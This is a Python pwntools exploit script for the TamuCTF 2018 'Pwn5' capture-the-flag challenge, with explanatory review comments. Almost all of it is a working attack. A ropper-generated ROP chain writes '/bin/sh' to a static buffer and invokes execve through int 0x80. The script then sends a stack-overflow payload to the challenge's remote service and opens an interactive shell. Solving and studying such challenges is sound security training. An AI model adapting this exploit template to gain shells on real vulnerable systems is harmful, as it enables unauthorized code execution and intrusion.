TamuCTF 2018, Pwn5
from pwn import * | |
# Load the challenge binary so symbol addresses can be resolved from it.
e = ELF('./pwn5')
# Absolute addresses inside the binary (no relocation is applied anywhere in
# this script, so it presumably runs without PIE). The names suggest these are
# the static buffers holding the first/last name inputs -- confirm against the
# disassembly before reusing them.
first_name_addr = 0x080F1A20
last_name_addr = 0x080F1A9F
# Address of exit(), used as the return address after the syscall gadget.
# NOTE(review): this rebinds the builtin `exit`; a name such as exit_addr would
# avoid the shadowing.
exit = e.symbols['exit']
def get_rop():
    """Build the ROP chain that replaces the overwritten return address.

    This is the ropper-generated chain pasted in verbatim, which is why the
    shebang line and a function-local ``from struct import pack`` sit inside
    the body. It uses ``first_name_addr`` as scratch memory: "/bin" and
    "/sh\\0" are stored there as two dwords, a NULL dword follows them, and
    ebx/ecx/edx are then loaded with the string address and the address of the
    NULL before eax is set to 0xb and ``int 0x80`` is executed (the i386
    execve convention: ebx=pathname, ecx=argv, edx=envp).

    Returns:
        The chain as a byte string. The script is written for Python 2 (see
        ``raw_input`` at the bottom of the file), where ``str`` is bytes;
        ``p32`` comes from ``from pwn import *``.
    """
    #!/usr/bin/env python
    # Generated by ropper ropchain generator # 
    from struct import pack
    # pack('I', x) is a native-byte-order unsigned 32-bit value; on a
    # little-endian host this matches p32, which is why the two are mixed below.
    p = lambda x : pack('I', x)
    IMAGE_BASE_0 = 0x08048000 # pwn5
    # ropper emits gadget offsets relative to the image base; each trailing
    # comment gives the absolute address and the gadget's instructions.
    rebase_0 = lambda x : p(x + IMAGE_BASE_0)
    rop = ''
    # Scratch area where "/bin/sh\0" is assembled one dword at a time.
    var_1 = first_name_addr
    # [var_1] = "/bin"
    rop += rebase_0(0x00074396) # 0x080bc396: pop eax; ret; 
    rop += '/bin'
    rop += rebase_0(0x0002b38a) # 0x0807338a: pop edx; ret; 
    rop += p32(var_1)
    rop += rebase_0(0x0000d12b) # 0x0805512b: mov dword ptr [edx], eax; ret; 
    # [var_1 + 4] = "/sh\0"
    rop += rebase_0(0x00074396) # 0x080bc396: pop eax; ret; 
    rop += '/sh\0'
    rop += rebase_0(0x0002b38a) # 0x0807338a: pop edx; ret; 
    rop += p32(var_1 + 4)
    rop += rebase_0(0x0000d12b) # 0x0805512b: mov dword ptr [edx], eax; ret; 
    # Alternative NULL store via `pop dword ptr [ecx]` left disabled by the author.
    #rop += rebase_0(0x0000399a) # 0x0804b99a: pop dword ptr [ecx]; ret; 
    #rop += p(0x00000000)
    # [var_1 + 8] = 0, the NULL used for both argv and envp below.
    rop += rebase_0(0x00074396) # 0x080bc396: pop eax; ret; 
    rop += p(0x00000000)
    rop += rebase_0(0x0002b38a) # 0x0807338a: pop edx; ret; 
    rop += p32(var_1 + 8)
    rop += rebase_0(0x0000d12b) # 0x0805512b: mov dword ptr [edx], eax; ret; 
    # ebx = pointer to "/bin/sh"
    rop += rebase_0(0x000001d1) # 0x080481d1: pop ebx; ret; 
    rop += p32(var_1)
    # ecx = argv = pointer to the NULL dword
    rop += rebase_0(0x0009c325) # 0x080e4325: pop ecx; ret; 
    rop += p32(var_1 + 8)
    # edx = envp = the same NULL
    rop += rebase_0(0x0002b38a) # 0x0807338a: pop edx; ret; 
    rop += p32(var_1 + 8)
    # eax = 0xb (execve on 32-bit Linux), then trap into the kernel.
    rop += rebase_0(0x00074396) # 0x080bc396: pop eax; ret; 
    rop += p(0x0000000b)
    rop += rebase_0(0x0002b990) # 0x08073990: int 0x80; ret; 
    return rop
# Local-process alternative kept for reference; the script as committed talks
# to the remote challenge service.
#r = process('./pwn5')
r = remote('pwn.ctf.tamu.edu' , 4325)
#r = remote('pwn.ctf.tamu.edu', 4324)
# Walk through the program's prompts: first name, last name, major, the
# corps-of-cadets y/n question and menu choice '2'. The commented-out
# recvuntil calls document what each prompt looks like; since nothing is read
# back, the sends are not synchronised with the prompts.
#r.recvuntil("?: ")
r.send("ffs\n")
#r.recvuntil('last name?: ')
r.send("ffs\n")
#r.recvuntil('your major?: ')
r.send('c\n')
#r.recvuntil('Are you joining the Corps of Cadets?(y/n): ')
r.send('y\n')
#r.recvuntil('4. Study\n')
r.send('2\n')
#r.recvuntil('to: ')
# Payload layout: 0x1c bytes of filler, then (going by the names) the saved
# ebp pointed at last_name_addr, the return address overwritten with the ROP
# chain, and finally exit's address, which the chain's closing `ret` pops.
ebp = p32(last_name_addr)
eip = get_rop()
payload = 'X' * 0x1c + ebp + eip + p32(exit)
# raw_input marks this as Python 2; under Python 3 the str/bytes concatenation
# above would raise a TypeError.
raw_input('fire?')
r.send(payload + '\n')
# Keep a copy of the payload on disk.
# NOTE(review): a `with open(...) as fp:` block would close the file on error.
fp = open('payload5', 'w')
fp.write(payload)
fp.close()
r.interactive()